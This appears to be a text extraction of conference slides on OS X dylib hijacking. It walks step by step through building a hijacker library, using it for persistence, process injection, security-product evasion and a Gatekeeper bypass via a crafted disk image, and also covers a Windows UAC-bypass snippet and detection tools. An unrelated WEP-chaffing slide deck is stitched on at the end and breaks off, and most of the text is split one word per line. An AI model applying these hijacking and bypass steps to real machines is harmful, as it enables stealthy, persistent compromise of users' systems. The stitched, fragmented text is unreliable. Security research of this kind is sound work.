vulnerable binary
persistence
process injection
escalation of privileges
(uac bypass)
‘remote’ infection
}
in the wild
DLL HIJACKING ATTACKS
//paths
to
abuse
char*
uacTargetDir[]
=
{"system32\\sysprep",
"ehome"};
char*
uacTargetApp[]
=
{"sysprep.exe",
"mcx2prov.exe"};
char*
uacTargetDll[]
=
{
"cryptbase.dll"
,
"CRYPTSP.dll"};
//execute
vulnerable
application
&
perform
DLL
hijacking
attack
if(Exec(&exitCode,
"cmd.exe
/C
%s",
targetPath))
{
if(exitCode
==
UAC_BYPASS_MAGIC_RETURN_CODE)
DBG("UAC
BYPASS
SUCCESS")
...
bypassing UAC (carberp, blackbeard, etc.)
“we had a plump stack of malware samples in our
library that all had this name (fxsst.dll) and were
completely unrelated to each other” -mandiant
persistence
priv esc
the current state of affairs
DLL HIJACKING
2010
today
M$oft Security Advisory 2269637 &
‘Dynamic-Link Library Security’ doc
“Any OS which allows for dynamic linking
of external libraries is theoretically
vulnerable to [dll hijacking]”
-Marc B (stackoverflow.com)
fully qualified paths
SafeDllSearchMode &
CWDIllegalInDllSearch
dylib hijacking
(OS X)
'C:\Windows\system32\blah.dll'
7/2015
MS15-069
DYLIB HIJACKING
…on OS X
macs are everywhere (home & enterprise)
THE RISE OF MACS
macs as % of total usa pc sales
#3 usa / #5 worldwide
vendor in pc shipments
percentage
0
3.5
7
10.5
14
year
'09
'10
'11
'12
'13
"Mac notebook sales have grown 21% over the last year,
while total industry sales have fallen" -apple (3/2015)
some apple specific terminology
APPLE PARLANCE
Mach object file format (or 'Mach-O') is OS X's
native file format for executables, shared libraries,
dynamically-loaded code, etc.
Load commands specify the layout and linkage
characteristics of the binary (memory layout,
initial execution state of the main thread, names
of dependent dylibs, etc).
}
mach-o
dylibs
Also known as dynamic shared libraries, shared
objects, or dynamically linked libraries, dylibs are
simply libraries intended for dynamic linking.
load
commands
instructions to the loader (including required libraries)
LOAD COMMANDS
MachOView
dumping load commands
$otool
-‐l
/Applications/Calculator.app/Contents/MacOS/Calculator
...
Load
command
12
cmd
LC_LOAD_DYLIB
cmdsize
88
name
/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
time
stamp
2
Wed
Dec
31
14:00:02
1969
current
version
21.0.0
compatibility
version
1.0.0
dylib specific load commands
LC_LOAD*_DYLIB/LC_ID_DYLIB LOAD COMMANDS
struct
dylib_command
{
uint32_t
cmd;
/*
LC_ID_DYLIB,
LC_LOAD_{,WEAK_}DYLIB,
LC_REEXPORT_DYLIB
*/
uint32_t
cmdsize;
/*
includes
pathname
string
*/
struct
dylib
dylib;
/*
the
library
identification
*/
};
mach-‐o/loader.h
mach-‐o/loader.h
struct
dylib
{
union
lc_str
name;
/*
library's
path
name
*/
uint32_t
timestamp;
/*
library's
build
time
stamp
*/
uint32_t
current_version;
/*
library's
current
vers
number
*/
uint32_t
compatibility_version;
/*
library's
compatibility
vers
number*/
};
struct dyld_command
struct dylib
used to find &
uniquely ID the
library
the idea is simple
DYLIB HIJACKING ATTACKS
plant a malicious dynamic library such that the
dynamic loader will automatically load it into a
vulnerable application
no other system modifications
independent of users’ environment
}
‣ no patching binaries
‣ no editing config files
‣ $PATH, (/etc/paths)
‣ DYLD_*
constraints
abusing for malicious purposes ;)
DYLIB HIJACKING ATTACKS
vulnerable binary
persistence
process injection
‘remote’ infection
}
security product
bypass
just like dll hijacking
on windows!
a conceptual overview of dyld
OS X’S DYNAMIC LOADER/LINKER
/usr/lib/dyld
$
file
/usr/lib/dyld
/usr/lib/dyld
(for
architecture
x86_64):
Mach-‐O
64-‐bit
dynamic
linker
x86_64
/usr/lib/dyld
(for
architecture
i386):
Mach-‐O
dynamic
linker
i386
…
}
find
load
link
…
dynamic libraries (dylibs)
__dyld_start
a (very) brief walk-thru
OS X’S DYNAMIC LOADER/LINKER
dyldStartup.s/__dyld_start
sets up stack & jumps to
dyldbootstrap::start() which
calls _main()
dyld.cpp/_main()
calls link(ptrMainExe), calls
image->link()
ImageLoader.cpp/link()
calls ImageLoader::
recursiveLoadLibraries()
ImageLoader.cpp/
recursiveLoadLibraries()
gets dependent libraries, calls
context.loadLibrary() on each
dyld.cpp/load()
calls loadPhase0() which calls,
loadPhase1()… until loadPhase6()
dyld.cpp/loadPhase6()
maps in file then calls
ImageLoaderMachO::instantiateFr
omFile()
open source, at
www.opensource.apple.com (dyld-‐353.2.1)
again, a simple idea
LET THE HUNT BEGIN
is there code in dyld that:
doesn’t error out if a dylib isn’t found?
looks for dylibs in multiple locations?
if the answer is 'YES' to either question, its
theoretically possible that binaries on OS X could
by vulnerable to a dylib hijacking attack!
are missing dylibs are ok?
ALLOWING A DYLIB LOAD TO FAIL
//attempt
to
load
all
required
dylibs
void
ImageLoader::recursiveLoadLibraries(
...
)
{
//get
list
of
libraries
this
image
needs
DependentLibraryInfo
libraryInfos[fLibraryCount];
this-‐>doGetDependentLibraries(libraryInfos);
//try
to
load
each
each
for(unsigned
int
i=0;
i
<
fLibraryCount;
++i)
{
//load
try
{
dependentLib
=
context.loadLibrary(libraryInfos[i],
...
);
...
}
catch(const
char*
msg)
{
if(requiredLibInfo.required)
throw
dyld::mkstringf("Library
not
loaded:
%s\n
Referenced
from:
%s\n
Reason:
%s",
requiredLibInfo.name,
this-‐>getRealPath(),
msg);
//ok
if
weak
library
not
found
dependentLib
=
NULL;
}
}
error logic for missing dylibs
ImageLoader.cpp
where is the ‘required’ variable set?
ALLOWING A DYLIB LOAD TO FAIL
//get
all
libraries
required
by
the
image
void
ImageLoaderMachO::doGetDependentLibraries(DependentLibraryInfo
libs[]){
//get
list
of
libraries
this
image
needs
const
uint32_t
cmd_count
=
((macho_header*)fMachOData)-‐>ncmds;
const
struct
load_command*
const
cmds
=
(struct
load_command*)&fMachOData[sizeof(macho_header)];
const
struct
load_command*
cmd
=
cmds;
//iterate
over
all
load
commands
for
(uint32_t
i
=
0;
i
<
cmd_count;
++i)
{
switch
(cmd-‐>cmd)
{
case
LC_LOAD_DYLIB:
case
LC_LOAD_WEAK_DYLIB:
...
//set
required
variable
(&libs[index++])-‐>required
=
(cmd-‐>cmd
!=
LC_LOAD_WEAK_DYLIB);
break;
}
//go
to
next
load
command
cmd
=
(const
struct
load_command*)(((char*)cmd)+cmd-‐>cmdsize);
}
setting the 'required' variable
ImageLoaderMachO.cpp
LC_LOAD_WEAK_DYLIB:
weak 'import' (not required)
binaries that import weak dylibs can be hijacked
HIJACK 0X1: LC_LOAD_WEAK_DYLIB
LC_LOAD_WEAK_DYLIB:
/usr/lib/<blah>.dylib
/usr/lib
weak request,
so 'not-found' is ok!
find/load <blah>.dylib
not found!
LC_LOAD_WEAK_DYLIB:
/usr/lib/<blah>.dylib
/usr/lib
find/load <blah>.dylib
<blah>.dylib
ohhh, what do we have here?!
LOOKING FOR DYLIBS IN MULTIPLE LOCATIONS
//substitute
@rpath
with
all
-‐rpath
paths
up
the
load
chain
for(const
ImageLoader::RPathChain*
rp=context.rpath;
rp
!=
NULL;
rp=rp-‐>next){
//try
each
rpath
for(std::vector<const
char*>::iterator
it=rp-‐>paths-‐>begin();
it
!=
rp-‐>paths-‐>end();
++it){
//build
full
path
from
current
rpath
char
newPath[strlen(*it)
+
strlen(trailingPath)+2];
strcpy(newPath,
*it);
strcat(newPath,
"/");
strcat(newPath,
trailingPath);
//TRY
TO
LOAD
//
-‐>if
this
fails,
will
attempt
next
variation!!
image
=
loadPhase4(newPath,
orgPath,
context,
exceptions);
if(image
!=
NULL)
dyld::log("RPATH
successful
expansion
of
%s
to:
%s\n",
orgPath,
newPath);
else
dyld::log("RPATH
failed
to
expanding
%s
to:
%s\n",
orgPath,
newPath);
//if
found/load
image,
return
it
if(image
!=
NULL)
return
image;
}
}
loading dylibs from various locations
dyld.cpp
...a special keyword for the loader/linker
WTF ARE @RPATHS?
introduced in OS X
10.5 (leopard)
To use run-path dependent libraries, an executable provides a list of run-
path search paths, which the dynamic loader traverses at load time to
find the libraries.” -apple
“A run-path dependent library is a dependent library whose complete
install name (path) is not known when the library is created….
"ohhh, so dyld will look for the dylib in multiple
locations?!?"
"Breaking the links: exploiting the linker"
Tim Brown (@timb_machine)
rpaths on linux (no OS X)
a run-path dependent library
AN EXAMPLE
compiled run-path dependent library
$
otool
-‐l
rpathLib.framework/Versions/A/rpathLib
Load
command
3
cmd
LC_ID_DYLIB
cmdsize
72
name
@rpath/rpathLib.framework/Versions/A/rpathLib
time
stamp
1
Wed
Dec
31
14:00:01
1969
current
version
1.0.0
compatibility
version
1.0.0
set install dir to '@rpath'
an app that links against an @rpath'd dylib
AN EXAMPLE
the “run-path dependent library(s)”
LC_LOAD*_DYLIB LC(s) containing "@rpath" in the
dylib path -> tells dyld to “to search a list of paths in
order to locate the dylib"
the list of “run-path search paths”
LC_RPATH LCs containing the run-time paths
which at runtime, replace "@rpath"
}
dylib dependency
specifying 'RunPath Search Paths'
LC_LOAD_DYLIB load commands prefixed with '@rpath'
RUN-PATH DEPENDENT LIBRARIES
an application linked against an @rpath import
$
otool
-‐l
rPathApp.app/Contents/MacOS/rPathApp
Load
command
12
cmd
LC_LOAD_DYLIB
cmdsize
72
name
@rpath/rpathLib.framework/Versions/A/rpathLib
time
stamp
2
Wed
Dec
31
14:00:02
1969
current
version
1.0.0
compatibility
version
1.0.0
“hey dyld, I depend on the rpathLib dylib, but when built, I
didn’t know exactly where it would be installed. Please use my
embedded run-path search paths to find & load it!”
-the executable
LC_RPATH load commands containing the run-path search paths
RUN-PATH SEARCH PATH(S)
embedded LC_PATH commands
$
otool
-‐l
rPathApp.app/Contents/MacOS/rPathApp
Load
command
18
cmd
LC_RPATH
cmdsize
64
path
/Applications/rPathApp.app/Contents/Library/One
Load
command
19
cmd
LC_RPATH
cmdsize
64
path
/Applications/rPathApp.app/Contents/Library/Two
one for each search
directory
struct
rpath_command
{
uint32_t
cmd;
/*
LC_RPATH
*/
uint32_t
cmdsize;
/*
includes
string
*/
union
lc_str
path;
/*
path
to
add
to
run
path
*/
};
mach-‐o/loader.h
struct dyld_command (LC_RPATH LC)
how the linker/loader interacts with LC_RPATH load commands
DYLD AND THE ‘RUN-PATH’ SEARCH PATH(S)
void
ImageLoader::recursiveLoadLibraries(…){
//get
list
of
rpaths
that
this
image
adds
std::vector<const
char*>
rpathsFromThisImage;
this-‐>getRPaths(context,
rpathsFromThisImage);
saving all "run-path search paths"
ImageLoader.cpp
void
ImageLoaderMachO::getRPaths(...,
std::vector<const
char*>&
paths){
//iterate
over
all
load
commands
//
-‐>look
for
LC_RPATH
and
save
their
path’s
for(uint32_t
i
=
0;
i
<
cmd_count;
++i){
switch(cmd-‐>cmd){
case
LC_RPATH:
//save
‘run-‐path’
search
path
paths.push_back((char*)cmd
+
((struct
rpath_command*)cmd)-‐>path.offset);
//keep
scanning
load
commands...
cmd
=
(const
struct
load_command*)(((char*)cmd)+cmd-‐>cmdsize);
ImageLoader.cpp
invoking getRPaths() to parse all LC_RPATHs
dealing with LC_LOAD_DYLIBs that contain '@rpath'
DYLD & '@RPATH'
//expand
'@rpaths'
static
ImageLoader*
loadPhase3(...)
{
//replace
‘@rpath’
with
all
resolved
run-‐path
search
paths
&
try
load
else
if(context.implicitRPath
||
(strncmp(path,
"@rpath/",
7)
==
0)
)
{
//get
part
of
path
after
'@rpath/'
const
char*
trailingPath
=
(strncmp(path,
"@rpath/",
7)
==
0)
?
&path[7]
:
path;
//substitute
@rpath
with
all
-‐rpath
paths
up
the
load
chain
for(std::vector<const
char*>::iterator
it=rp-‐>paths-‐>begin();
it
!=
rp-‐>paths-‐>end();
++it){
//build
full
path
from
current
rpath
char
newPath[strlen(*it)
+
strlen(trailingPath)+2];
strcpy(newPath,
*it);
strcat(newPath,
"/");
strcat(newPath,
trailingPath);
//TRY
TO
LOAD
image
=
loadPhase4(newPath,
orgPath,
context,
exceptions);
//if
found/loaded
image,
return
it
if(image
!=
NULL)
return
image;
}//try
all
run-‐path
search
paths
loading dylibs from various locations
dyld.cpp
'@rpath' imports not found in the primary search directory
HIJACK 0X2: LC_LOAD_DYLIB + LC_RPATHS
LC_LOAD_DYLIB:
@rpath/<blah>.dylib
find/load <blah>.dylib
LC_RPATH:
/Applications/blah.app/Library
LC_RPATH:
/System/Library
<blah>.dylib
/System/Library
/Applications/blah.app/Library
<blah>.dylib
/Applications/blah.app/
Library/blah.dylib
/System/Library/blah.dylib
resolved paths
possible, given either of the following conditions!
DYLIB HIJACKING AN OS X BINARY
}
contains a LC_LOAD_WEAK_DYLIB
load command that references a
non-existent dylib
contains multiple LC_RPATH load commands
(i.e. run-path search paths)
contains a LC_LOAD*_DYLIB load command
with a run-path dependent library ('@rpath')
not found in a primary run-path search path
+
vulnerable
application
hijacking the sample binary (rPathApp)
EXAMPLE TARGET
confirm the vulnerability
$
export
DYLD_PRINT_RPATHS="1"
$
/Applications/rPathApp.app/Contents/MacOS/rPathApp
RPATH
failed
to
expanding
@rpath/rpathLib.framework/Versions/A/rpathLib
to:
/Applications/rPathApp.app/Contents/MacOS/../Library/One/rpathLib.framework/Versions/A/rpathLib
RPATH
successful
expansion
of
@rpath/rpathLib.framework/Versions/A/rpathLib
to:
/Applications/rPathApp.app/Contents/MacOS/../Library/Two/rpathLib.framework/Versions/A/rpathLib
/Applications/rPathApp.app/
Contents/Library/One/...
/Applications/rPathApp.app/
Contents/Library/Two/...
first location is
empty!
place dylib into the primary search location
HIJACK ATTEMPT 0X1
__attribute__((constructor))
void
customConstructor(int
argc,
const
char
**argv)
{
//dbg
msg
syslog(LOG_ERR,
"hijacker
loaded
in
%s\n",
argv[0]);
}
'malicious' dylib
automatically invoked
$
/Applications/rPathApp.app/Contents/MacOS/rPathApp
RPATH
successful
expansion
of
@rpath/rpathLib.framework/Versions/A/rpathLib
to:
/Applications/rPathApp.app/Contents/MacOS/../Library/One/rpathLib.framework/Versions/A/rpathLib
dyld:
Library
not
loaded:
@rpath/rpathLib.framework/Versions/A/rpathLib
Referenced
from:
/Applications/rPathApp.app/Contents/MacOS/rPathApp
Reason:
Incompatible
library
version:
rPathApp
requires
version
1.0.0
or
later,
but
rpathLib
provides
version
0.0.0
Trace/BPT
trap:
5
success :) then fail :(
dylib's 'payload'
dyld checks version numbers
DYLIB VERSIONING
ImageLoader::recursiveLoadLibraries(...)
{
LibraryInfo
actualInfo
=
dependentLib-‐>doGetLibraryInfo();
//compare
version
numbers
if(actualInfo.minVersion
<
requiredLibInfo.info.minVersion)
{
//record
values
for
use
by
CrashReporter
or
Finder
dyld::throwf("Incompatible
library
version:
.....");
}
ImageLoader.cpp
ImageLoaderMachO::doGetLibraryInfo()
{
LibraryInfo
info;
const
dylib_command*
dylibID
=
(dylib_command*)
(&fMachOData[fDylibIDOffset]);
//extract
version
info
from
LC_ID_DYLIB
info.minVersion
=
dylibID-‐>dylib.compatibility_version;
info.maxVersion
=
dylibID-‐>dylib.current_version;
return
info
ImageLoaderMachO.cpp
$
otool
-‐l
rPathApp
Load
command
12
cmd
LC_LOAD_DYLIB
cmdsize
72
name
...
rpathLib
current
version
1.0.0
compatibility
version
1.0.0
$
otool
-‐l
rPathLib
Load
command
12
cmd
LC_ID_DYLIB
cmdsize
72
name
...
rpathLib
current
version
0.0.0
compatibility
version
0.0.0
hijacker dylib
versioning mismatch
target (legit) dylib
compatible version numbers/symbol fail
HIJACK ATTEMPT 0X2
setting version numbers
$
/Applications/rPathApp.app/Contents/MacOS/rPathApp
RPATH
successful
expansion
of
@rpath/rpathLib.framework/Versions/A/rpathLib
to:
/Applications/rPathApp.app/Contents/MacOS/../Library/One/rpathLib.framework/Versions/A/rpathLib
dyld:
Symbol
not
found:
_OBJC_CLASS_$_SomeObject
Referenced
from:
/Applications/rPathApp.app/Contents/MacOS/rPathApp
Expected
in:
/Applications/rPathApp.app/Contents/MacOS/../Library/One/rpathLib.framework
/Versions/A/rpathLib
Trace/BPT
trap:
5
success :) then fail :(
$
otool
-‐l
rPathLib
Load
command
12
cmd
LC_ID_DYLIB
cmdsize
72
name
...
rpathLib
current
version
1.0.0
compatibility
version
1.0.0
hijacker dylib
hijacker dylib must export the expected symbols
SOLVING THE EXPORTS ISSUE
$
dyldinfo
-‐export
/Library/Two/rpathLib.framework/Versions/A/rpathLib
0x00001100
_OBJC_METACLASS_$_SomeObject
0x00001128
_OBJC_CLASS_$_SomeObject
exports from legit dylib
sure we could get the hijacker to directly export all the same
symbols from the original...but it'd be more elegant to have it
re-export them, forwarding ('proxying') everything on to the
original dylib!
<blah>.dylib
<blah>.dylib
resolve _SomeObject
_SomeObject
telling the dyld where to find the required symbols
RE-EXPORTING SYMBOLS
LC_REEXPORT_DYLIB load command
$
otool
-‐l
rPathLib
Load
command
9
cmd
LC_REEXPORT_DYLIB
cmdsize
72
name
@rpath/rpathLib.framework
/Versions/A/rpathLib
}
ld inserts name from target
(legit) library (will be @rpath/...
which dyld doesn't resolve)
ld cannot link if target dylib
falls within an umbrella
framework
-Xlinker
-reexport_library
<path to legit dylib>
linker flags
fix with install_name_tool
RE-EXPORTING SYMBOLS
install_name_tool -change
<existing value of LC_REEXPORT_DYLIB>
<new value for to LC_REEXPORT_DYLIB (e.g target dylib)>
<path to dylib to update>
$
install_name_tool
-‐change
@rpath/rpathLib.framework/Versions/A/rpathLib
/Applications/rPathApp.app/Contents/Library/Two/rpathLib.framework/Versions/A/rpathLib
/Applications/rPathApp.app/Contents/Library/One/rpathLib.framework/Versions/A/rpathlib
$
otool
-‐l
Library/One/rpathLib.framework/Versions/A/rpathlib
Load
command
9
cmd
LC_REEXPORT_DYLIB
cmdsize
112
name
/Applications/rPathApp.app/Contents/Library/Two/rpathLib.framework/Versions/A/
fixing the target of the re-exported
updates the name in
LC_REEXPORT_DYLIB
all your base are belong to us :)
HIJACK SUCCESS!
hijacked loaded into app's process space
app runs fine!
$
lsof
-‐p
29593
COMMAND
NAME
rPathApp
/Users/patrick
rPathApp
/Applications/rPathApp.app/Contents/MacOS/rPathApp
rPathApp
/Applications/rPathApp.app/Contents/Library/One/rpathLib.framework/Versions/A/rpathlib
rPathApp
/Applications/rPathApp.app/Contents/Library/Two/rpathLib.framework/Versions/A/rpathLib
hijacker's 'payload'
hijacked app
ATTACKS & DEFENSE
impacts of hijacks
finding vulnerable binaries
AUTOMATION
$
python
dylibHijackScanner.py
getting
list
of
all
executable
files
on
system
will
scan
for
multiple
LC_RPATHs
and
LC_LOAD_WEAK_DYLIBs
found
91
binaries
vulnerable
to
multiple
rpaths
found
53
binaries
vulnerable
to
weak
dylibs
rPathApp.app
has
multiple
rpaths
(dylib
not
in
primary
directory)
({
'binary':
'/rPathApp.app/Contents/MacOS/rPathApp',
'importedDylib':
'/rpathLib.framework/Versions/A/rpathLib',
'LC_RPATH':
'rPathApp.app/Contents/Library/One'
})
LC_LOAD_WEAK_DYLIB that reference a non-existent dylib
LC_LOAD*_DYLIB with @rpath'd import & multiple LC_RPATHs with the
run-path dependent library not found in a primary run-path search path
automated vulnerability detection
you might have heard of these guys?
AUTOMATION FINDINGS
Apple
Microsoft
Others
iCloud Photos
Xcode
iMovie (plugins)
Quicktime (plugins)
Word
Excel
Powerpoint
Upload Center
Google(drive)
Adobe (plugins)
GPG Tools
DropBox
results:
only from one scan (my box)
tool to create compatible hijackers
AUTOMATION
$
python
createHijacker.py
Products/Debug/libhijack.dylib
/Applications/rPathApp.app/
Contents/Library/Two/rpathLib.framework/Versions/A/rpathLib
hijacker
dylib:
libhijack.dylib
target
(existing)
dylib:
rpathLib
[+]
parsing
'rpathLib'
to
extract
version
info
[+]
parsing
'libhijack.dylib'
to
find
version
info
updating
version
info
in
libhijack.dylib
to
match
rpathLib
[+]
parsing
'libhijack.dylib'
to
extract
faux
re-‐export
info
updating
embedded
re-‐export
via
exec'ing:
/usr/bin/install_name_tool
-‐change
configured
libhijack.dylib
(renamed
to:
rpathLib)
as
compatible
hijacker
for
rpathLib
extract target dylib's version numbers and patch them into hijacker
re-export ('forward') exports by executing install_name_tool to
update LC_REEXPORT_DYLIB in the hijacker to reference target dylib
automated hijacker configuration
ideal for a variety of reasons...
GAINING PERSISTENCE
gain automatic & persistent code execution
whenever the OS restarts/the user logs only via a
dynamic library hijack
the goal
}
no binary / OS file modifications
no new processes
hosted within a trusted process
abuses legitimate functionality
via Apple's PhotoStreamAgent ('iCloudPhotos.app')
GAINING PERSISTENCE
$
python
dylibHijackScanner.py
PhotoStreamAgent
is
vulnerable
(multiple
rpaths)
'binary':
'/Applications/iPhoto.app/Contents/Library/LoginItems/
PhotoStreamAgent.app/Contents/MacOS/PhotoStreamAgent'
'importedDylib':
'/PhotoFoundation.framework/Versions/A/PhotoFoundation'
'LC_RPATH':
'/Applications/iPhoto.app/Contents/Library/LoginItems'
configure hijacker against PhotoFoundation (dylib)
copy to /Applications/iPhoto.app/Contents/
Library/LoginItems/PhotoFoundation.framework/
Versions/A/PhotoFoundation
$
reboot
$
lsof
-‐p
<pid
of
PhotoStreamAgent>
/Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation
/Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation
PhotoStreamAgent
ideal for a variety of reasons...
PROCESS INJECTION ('LOAD TIME')
gain automatic & persistent code execution within
a process only via a dynamic library hijack
the goal
}
no binary / OS file modifications
no process monitoring
no complex runtime injection
no detection of injection
<010>
via Apple's Xcode
GAINING PROCESS INJECTION
$
python
dylibHijackScanner.py
Xcode
is
vulnerable
(multiple
rpaths)
'binary':
'/Applications/Xcode.app/Contents/MacOS/Xcode'
'importedDylib':
'/DVTFoundation.framework/Versions/A/DVTFoundation'
'LC_RPATH':
'/Applications/Xcode.app/Contents/Frameworks'
configure hijacker against DVTFoundation (dylib)
copy to /Applications/Xcode.app/Contents/
Frameworks/DVTFoundation.framework/Versions/A/
do you trust your
compiler now!?
(k thompson)
Xcode
ideal for a variety of reasons...
BYPASSING PERSONAL SECURITY PRODUCTS
gain automatic code execution within a trusted
process only via a dynamic library hijack to
perform some previously disallowed action
the goal
}
no binary / OS file modifications
novel technique
hosted within a trusted process
abuses legitimate functionality
become invisible to LittleSnitch via GPG Tools
BYPASSING PERSONAL SECURITY PRODUCTS
$
python
dylibHijackScanner.py
GPG
Keychain
is
vulnerable
(weak/rpath'd
dylib)
'binary':
'/Applications/GPG
Keychain.app/Contents/MacOS/GPG
Keychain'
'weak
dylib':
'/Libmacgpg.framework/Versions/B/Libmacgpg'
'LC_RPATH':
'/Applications/GPG
Keychain.app/Contents/Frameworks'
GPG Keychain
LittleSnitch rule
for GPG Keychain
got 99 problems but LittleSnitch ain't one ;)
bypassing Gatekeeper
'REMOTE' (NON-LOCAL) ATTACK
circumvent gatekeeper's draconic blockage via a
dynamic library hijack
the goal
can we bypass this
(unsigned code to run)?
gatekeeper in action
all files with quarantine attribute are checked
HOW GATEKEEPER WORKS
quarantine attributes
//attributes
$
xattr
-‐l
~/Downloads/malware.dmg
com.apple.quarantine:0001;534e3038;
Safari;
B8E3DA59-‐32F6-‐4580-‐8AB3...
safari, etc. tags
downloaded content
"Gatekeeper is an anti-malware feature of the OS X operating
system. It allows users to restrict which sources they can install
applications from, in order to reduce the likelihood of executing a
Trojan horse"
go home gatekeeper, you are drunk!
GATEKEEPER BYPASS
find an -signed or 'mac app store' app that contains an external
relative reference to a hijackable dylib
create a .dmg with the necessary folder structure to contain the
malicious dylib in the externally referenced location
#winning
verified, so can't
modify
.dmg/.zip layout
(signed) application
<external>.dylib
gatekeeper only verifies
the app bundle!!
not verified!
1) a signed app that contains an external reference to hijackable dylib
GATEKEEPER BYPASS
$
spctl
-‐vat
execute
/Applications/Xcode.app/Contents/Applications/Instruments.app
Instruments.app:
accepted
source=Apple
System
$
otool
-‐l
Instruments.app/Contents/MacOS/Instruments
Load
command
16
cmd
LC_LOAD_WEAK_DYLIB
name
@rpath/CoreSimulator.framework/Versions/A/CoreSimulator
Load
command
30
cmd
LC_RPATH
path
@executable_path/../../../../SharedFrameworks
spctl tells you if gatekeeper will accept the app
Instruments.app - fit's the bill
2) create a .dmg with the necessary layout
GATEKEEPER BYPASS
required directory structure
'clean up' the .dmg
‣ hide files/folder
‣ set top-level alias to app
‣ change icon & background
‣ make read-only
(deployable) malicious .dmg
3) #winning
GATEKEEPER BYPASS
gatekeeper setting's
(maximum)
gatekeeper bypass :)
unsigned (non-Mac App Store)
code execution!!
CVE 2015-3715
patched in OS X 10.10.4
standard alert
low-tech abuse cases
GATEKEEPER BYPASS
"[there were over] sixty thousand calls to AppleCare technical
support about Mac Defender-related issues" -Sophos
fake codecs
fake installers/updates
why gatekeeper was born
infected torrents
what you really need to worry about :/
GATEKEEPER BYPASS
my dock
MitM & infect
insecure downloads
HTTP :(
Mac App Store
not vulnerable
these should be secure, right!?
INFECTING AV SOFTWARE DOWNLOADS
all the security software I could
find, was downloaded over HTTP!
LittleSnitch
Sophos
}
ClamXav
putting the pieces all together
END-TO-END ATTACK
persist
exfil file
download & execute cmd
persistently install a malicious
dylib as a hijacker
upload a file ('topSecret') to a
remote iCloud account
download and run a command
('Calculator.app')
no-r00t to install/run!
ClamXav
LittleSnitch
Sophos
the OS 'security' industry vs me ;)
PSP TESTING
are any of these
malicious actions blocked?
persist
exfil file
download & execute cmd
OS X 'security' products
what can be done to fix this mess
IT'S ALL BUSTED....FIXES?
Dylib Hijacking Fix?
Gatekeeper Bypass Fix
MitM Fix
CVE 2015-3715
patched in OS X 10.10.4
abuses a legit OS feature,
so unlikely to be fixed...
only allow signed dylibs?
only download software over secure
channels (HTTPS, etc)
disallow external dependencies?
still 'broken' ;)
EL CAPITAN (OS X 10.11)
next version of OS X will keep us all safe...right!?
System
Integrity
Protection
"A
new
security
policy
that
applies
to
every
running
process.
Code
injection
and
runtime
attachments
to
system
binaries
are
no
longer
permitted."
-‐apple.com
"rootless"
persistent dylib hijacking airportd OS X 10.11
"o rly?!"
loaded in airportd
but am I vulnerable? am I owned?
DEFENSE
Dylib Hijack Scanner (DHS)
free at
objective-see.com
hijacked
apps
'buggy'
apps
OBJECTIVE-SEE
free OS X tools (such as DHS) & malware samples
malware samples :)
KnockKnock
BlockBlock
TaskExplorer
CONCLUSIONS
…wrapping this up
powerful stealthy new class of attack
affects apple & 3rd party apps
persistence
process injection
‘remote’ infection
security product bypass
}
}
no binary / OS file modifications
abuses legitimate functionality
scan your system
download software over HTTPS
don't give your $ to the AV companies
users
QUESTIONS & ANSWERS
[email protected]
@patrickwardle
slides
syn.ac/defconHijack
feel free to contact me any time!
"What if every country has ninjas, but we only know about the
Japanese ones because they’re rubbish?" -DJ-2000, reddit.com
final thought ;)
python scripts
github.com/synack
white paper
www.virusbtn.com/dylib
}
credits
-
thezooom.com
-
deviantart.com (FreshFarhan)
-
http://th07.deviantart.net/fs70/PRE/f/2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
-
iconmonstr.com
-
flaticon.com
-
"Breaking the links: exploiting the linker" (Tim Brown) | pdf |
The Emperor Has No Cloak – WEP Cloaking Exposed
Vivek Ramachandran
( [email protected] )
Deepak Gupta
( [email protected] )
Security Research Team (Amit, Gopi, Pravin)
AirTight Networks
www.airtightnetworks.net
Background
Claim: WEP key cracking can be prevented
using WEP Chaffing.
Question: Is it safe to use WEP again now that
we have a cloak for it?
Vendor aims to ‘Cloak’ WEP, April 2007
“ .. [Cloaking] is designed to protect a widely used but flawed wireless
LAN encryption protocol ..”
“ .. Cloaking module creates dummy data traffic ... attacker can’t tell the
difference between product frames from the WLAN and spoofed
frames generated .. ”
Important Note
Our presentation this afternoon concerns a technique that
we refer to as "chaff insertion," which recently has been
proposed as a way to prevent cracking WEP keys. To
avoid any confusion, while our abstract may have
mentioned "WEP Cloaking," and while we may mention
"WEP Cloaking" during the course of our presentation, it
should be noted that WEP Cloaking is the name one
company is using to refer to its particular
implementation of the chaff insertion technique. Our
presentation is not intended as an analysis of or
commentary on this company's particular
implementation, but rather addresses the technique of
chaff insertion in general and demonstrates our belief
that the approach is easily defeated and does not
provide any useful protection against cracking WEP
keys.
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
Talk Outline
Evolution of WEP Cracking
What is WEP Chaffing? What are Chaff packets?
WEP Chaffing example
Techniques to counter different types of Chaff:
Random frames
Single key
Multiple keys
Random keys
…
Implementation problems with WEP Chaffing
Final verdict on WEP Chaffing
Q&A
WEP Cracking – what is it?
WEP is a per packet encryption
mechanism which uses a
combination of a shared secret
(WEP Key) and an Initialization
Vector (IV) for generating the
key stream using the RC4
encryption mechanism. This
key stream is XOR’ed with the
data and transmitted
WEP cracking involves trying to
infer the WEP Key using various
statistical attacks – FMS, KoreK
Lets now look at the historical
evolution of WEP Cracking
Cracks in WEP -- Historic Evolution
2001 - The insecurity of 802.11, Mobicom, July 2001
N. Borisov, I. Goldberg and D. Wagner.
2001 - Weaknesses in the key scheduling algorithm of RC4.
S. Fluhrer, I. Mantin, A. Shamir. Aug 2001.
2002 - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
A. Stubblefield, J. Ioannidis, A. Rubin.
2004 – KoreK, improves on the above technique and
reduces the complexity of WEP cracking. We now require
only around 500,000 packets to break the WEP key.
2005 – Adreas Klein introduces more correlations between
the RC4 key stream and the key.
2007 – PTW extend Andreas technique to further simplify
WEP Cracking. Now with just around 60,000 – 90,000
packets it is possible to break the WEP key.
IEEE WG admitted that WEP
cannot hold any water.
Recommended users to upgrade
to WPA, WPA2
This hasn’t stopped people from using
band-aids to stop leakage
128-bit key
